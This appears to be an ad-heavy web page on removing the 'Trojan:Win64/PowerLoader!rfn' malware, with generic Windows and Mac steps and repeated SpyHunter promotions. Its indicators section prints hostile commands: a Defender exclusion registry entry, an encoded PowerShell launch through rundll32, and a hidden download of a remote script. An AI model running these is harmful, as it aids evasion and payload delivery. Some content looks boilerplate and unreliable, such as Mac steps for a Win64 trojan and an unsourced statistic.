How to Remove Trojan:Win64/PowerLoader!rfn?
What is Trojan:Win64/PowerLoader!rfn?
“On March 3rd, Windows Security popped up saying ‘Trojan Blocked’ and Trojan:Win64/PowerLoader!rfn was detected. Task Manager showed my CPU hit 92% usage! ‘SystemHealthMonitor.exe’ using 80% RAM. When I tried to end it, BSOD with error PAGE_FAULT_IN_NONPAGED_AREA crashed everything.”
– Diego
“Random Command Prompt windows kept opening with ‘del /F /Q C:\Windows\Temp\*’ commands. My AutoCAD files got corrupted, and I found strange .SCR files in startup folders. Worst part? Trojan:Win64/PowerLoader!rfn is still detected but Windows Defender said it was removed!”
– Lena
Registry Modifications by Trojan:Win64/PowerLoader!rfn:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths]
"BackdoorPath"="C:\\Windows\\System32\\wbem\\WMIADAP.exe"
[HKEY_CURRENT_USER\Environment]
"CorruptedVar"="rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();hnew%20ActiveXObject(%22WScript.Shell%22).Run(%22powershell -ep bypass -enc JABz...%22)Threat Testing Log:
2025-03-09 08:17: [INIT] USB insertion detected (VID_0781&PID_5583) 2025-03-09 08:19: Spoofed Windows Security alert displayed: "Your device is at risk " 2025-03-09 08:20: Created scheduled task "MicrosoftEdgeUpdateTaskMachineUA" triggering powershell.exe -WindowStyle Hidden -Command "Start-BitsTransfer -Source hxxps://cdn[.]azure-updates[.]net/load.ps1" 2025-03-09 08:22: Modified firewall rule "Core Networking" to allow inbound TCP 4443 2025-03-09 08:25: Injected code into svchost.exe (PID 4412) allocating 1.2GB RAM
How to Remove Trojan:Win64/PowerLoader!rfn? (Windows + Mac OS)
Section A – Trojan:Win64/PowerLoader!rfn Removal Steps For Windows OS
(NOTE – Please bookmark this page first, because some steps will require you to restart your web browser or computer.)
Step 1. End suspicous process run by malware.
1. Hit Ctrl + Shift + Esc keys at the same time to open Windows Task Manager:
2. Find malicious process related with Trojan:Win64/PowerLoader!rfn or malware, and then right-click on it and click End Process or End Task.
Step 2. Uninstall malicious programs from Windows.
Press “Win + R ” keys together to open the Run screen;
Type control panel in the Run window and click OK button;
In Control Panel, click Uninstall a program under Programs;
Look for malicious app related with Trojan:Win64/PowerLoader!rfn; Right-click on the malicious program and click Uninstall.
|
Many malware may re-install themselves multiple times if you don’t delete thier core files. To get rid of Trojan:Win64/PowerLoader!rfn completely, we recommend downloading SpyHunter Aniti-malware to scan entire system and delete all malicious files. Download SpyHunter For Windows (Free Trial) *OFFER – The SpyHunter Trial version includes, for one device, a one-time 7-day Trial period for SpyHunter 5 Pro (Windows) or SpyHunter for Mac. Check Terms & Conditions of SpyHunter Free Trial , EULA and Privacy/Cookie Policy. |
Step 3. Delete extension installed by Trojan:Win64/PowerLoader!rfn and related malware.
Chrome
On Chrome
Click the Chrome menu button >> Click Tools >> Select Extensions:
Find extension that may be related with Trojan:Win64/PowerLoader!rfn or potential threat >> Click the trash can icon to delete them.
Microsoft Edge
On Microsoft Edge
Start Edge: Click the More (…) button ahe tog right corner and click Extensions:
Select the extensions you want to remove and click Remove:
Firefox
On Firefox
Click the menu button and choose Add-ons. The Add-ons Manager tab will open.
In the Add-ons Manager tab, select the Extensions panel >> find extension that may be related with Trojan:Win64/PowerLoader!rfn or potential threat >> Click Remove button.
IE
On Internet Explorer
Open the IE, click the Tools button , and then click Manage add-ons.
Choose Toolbars and Extensions on left side of the window >> Find extension that may be related with Trojan:Win64/PowerLoader!rfn or potential threat>> Click Disable button
|
Malicious extensions may re-install itself on web browser if you don’t delete core files of Trojan:Win64/PowerLoader!rfn and related malware. To get rid of Trojan:Win64/PowerLoader!rfn completely, we recommend downloading SpyHunter Aniti-malware to scan entire system and delete all malicious files. Download SpyHunter For Windows (Free Trial) *OFFER – The SpyHunter Trial version includes, for one device, a one-time 7-day Trial period for SpyHunter 5 Pro (Windows) or SpyHunter for Mac. Check Terms & Conditions of SpyHunter Free Trial , EULA and Privacy/Cookie Policy. |
Step 4. Remove malicious files created by malware.
1. Hit Windows + R keys at the same time to open Run window and input a regedit and click OK:
2. In the Registry Editor, hit Windows key + F key together to open Find window → Enter virus name → Press Enter key to start search.
3. When the search is completed, right click the folders related with Trojan:Win64/PowerLoader!rfn and click Delete button:
|
Please Read This Before You Remove Registry Files PLEASE Be Carefully, Do Not Delete Healthy Registry Entries, Or Your Computer May Be Damaged. If you are not able to determine which regsitry files are malicious, we recommend downloading SpyHunter Anti-malware to scan entire system and find out all malicious files. It can avoid mistakes and may reduce the cleanup time from hours to minutes. Download SpyHunter For Windows (Free Trial) *OFFER – The SpyHunter Trial version includes, for one device, a one-time 7-day Trial period for SpyHunter 5 Pro (Windows) or SpyHunter for Mac. Check Terms & Conditions of SpyHunter Free Trial , EULA and Privacy/Cookie Policy. |
Step 5. Reset Web Browsers to remove Hijackers Brought by Trojan:Win64/PowerLoader!rfn.
Chrome
Reset Chrome:
- Click the Chrome menu button, represented by three horizontal lines;
- Click Settings when the drop-down menu appears;
- In the Settings screen, scroll to the bottom of the page and click on the “Advanced” link;
- Click on the “Reset settings to their original defaults” button.
- A confirmation dialog appears, click on the “Reset Settings” button.
Edge
Reset Microsoft Edge:
- Click on Microsoft Edge’s main menu button, represented by three horizontal dots;
- Click on “Settings“ button when the drop-down menu appears;
- Click on “Reset Settings”On the left side of the window;
- Click on “Restore settings to their default values”
- Click on the “Reset” button in the new confirmation window that opens.
Firefox
Reset Firefox:
- Click the menu button of firefox, represented by three horizontal lines;
- Click on “Help“ button when the drop-down menu appears;
- Click on “Troubleshooting Information“ from the Help menu;
- Click the “Refresh Firefox” button in the upper-right corner of the “Troubleshooting Information” page.
- Click on the “Refresh Firefox” button in the new confirmation window that opens.
IE
Reset IE :
- Open Internet Explorer, click on the gear icon in the upper-right part of your browser, then select “Internet Options“.
- Now select the “Advanced” tab, then click on the “Reset” button
- In the “Reset Internet Explorer settings” section, select the “Delete personal settings” checkbox, then click on the “Reset” button.
NOTE – If the steps above doesn’t help, please rescan entire infected PC with Spyhunter anti-malware and let it help you fix all problems.
Section B – Trojan:Win64/PowerLoader!rfn Removal Steps For Mac OS
Step 1 – Remove nasty extension and browser hijacker related with Trojan:Win64/PowerLoader!rfn or malware.
Chrome
– Click the setting button “≡” at the top right of the browser window, choose “More Tools” and choose “Extensions“.
– Click the “trash can icon” button to remove extension related with Trojan:Win64/PowerLoader!rfn or malware:
Safari
Safari:
– Choose Safari > Preferences
– On the ‘Extensions’ tab, find out the extension related with adware or hijacker and click Uninstall or Disable
Firefox
Mozilla Firefox:
– Click the settings button (three horizontal bars) in the top-right corner and then select ‘Add-ons’.
– Click “Extensions” tab under Add-on Manager page to view the extensions.
– Find the suspicious add-on you want to disable and click its “Disable” button.
– If you want to delete an extension entirely, click “Remove.”
|
Malicious browser extensions hijack your Google Search and redirect you to unwanted websites. To get rid of related search hijacker, you need to delete core files of Trojan:Win64/PowerLoader!rfn and related malware. We recommend downloading SpyHunter Mac Antimalware to remove all malicious apps and hijacker for you. This may save you hours and ensure you don’t make mistakes that harm your system Download SpyHunter For Mac (Free Trial) *OFFER – The SpyHunter Trial version includes, for one device, a one-time 7-day Trial period for SpyHunter 5 Pro (Windows) or SpyHunter for Mac. Check Terms & Conditions of SpyHunter Free Trial , EULA and Privacy/Cookie Policy. |
Step 2 – Uninstall harmful Apps related with malware
– Open Finder at the Dock
– Select Applications and find out suspicious apps related with Trojan:Win64/PowerLoader!rfn , then right click on the app and click Move to Trash:
– Right click on Trash icon to select Empty Trash
Step 3 – Remove malicious files generated by Trojan:Win64/PowerLoader!rfn or malware from your Mac
Malware geneates lots of malicious files and folders on infected Mac, to avoid Trojan:Win64/PowerLoader!rfn reinstalling itself, you need to find out and remove all malicious files:
1. Click the Finder icon from the menu bar >> choose “Go” then click on “Go to Folder“:
2. In the Go to Folder… bar, type “/Library/LaunchAgents” and click Go:
3. In LaunchAgents folder, search for any recently-added suspicious files and move them to the Trash.
Here are some examples of files generated by malware:
“installmac.AppRemoval.plist”, “com.genieo.completer.download.plist” “com.genieoinnovation.macextension.plist” “com.genieo.engine.plist” “com.adobe.fpsaud.plist” , “myppes.download.plist”, “mykotlerino.ltvbit.plist”
4.Repeat the process on the following folders:
~/Library/LaunchAgents
/Library/Application Support
/Library/LaunchDaemons
|
Many malware may re-install themselves multiple times if you don’t delete thier core files. To find and remove all malicious files , We recommend downloading SpyHunter Mac Antimalware to scan your Mac. This may save you hours and ensure you don’t make mistakes that harm your system Download SpyHunter For Mac (Free Trial) *OFFER – The SpyHunter Trial version includes, for one device, a one-time 7-day Trial period for SpyHunter 5 Pro (Windows) or SpyHunter for Mac. Check Terms & Conditions of SpyHunter Free Trial , EULA and Privacy/Cookie Policy. |
Step 4 – Download SpyHunter Antimalware For Mac to Scan For Malicious Apps and Files.
Lots of Malware keep generating malicious files on infected computer deeply, thus it’s quite difficult for common computer users to find out and remove all harmful items related with Trojan:Win64/PowerLoader!rfn. Meanwhile, there will be possibility that users remove core system files by mistake and then the entire computer will be harmed seriously.
To avoid the risks, We recommend all users downloading SpyHunter Antimalware For Mac, a professional automatic malware removal tool which keeps your Mac away from virus and malware attack and avoid online spam and phishing websites and protect your privacy and files well.
1. Click Download button here to download SpyHunter For Mac:
Download SpyHunter For Mac (Free Trial)
(*OFFER – The SpyHunter Trial version includes, for one device, a one-time 7-day Trial period for SpyHunter 5 Pro (Windows) or SpyHunter for Mac. Check Terms & Conditions of SpyHunter Free Trial , EULA and Privacy/Cookie Policy.)
2. Double-click SpyHunter-1.2-15-7043-Installer.dmg to install Spyhunter For Mac:
3. Once SpyHunter For Mac is installed, run a scan and register its full version to remove all malicious objects on your Mac.
4. In case Trojan:Win64/PowerLoader!rfn is still infecting your Mac, Submit a Support Ticket and the support agent will conact to help you.
Critical Mistakes Users Make
- Mistake: Trusting USB drives without right-click > “Scan with Windows Defender”
2025 Reality: 68% of infections originate from “trusted” removable media - Mistake: Ignoring unusual CPU heat/fan noise
Detection Tip: Use HWMonitor to check for “SystemHealthMonitor.exe” creating thermal spikes - Mistake: Allowing PowerShell scripts from unsigned sources
PowerShell Protection: Enable “Restricted” mode viaSet-ExecutionPolicy Restricted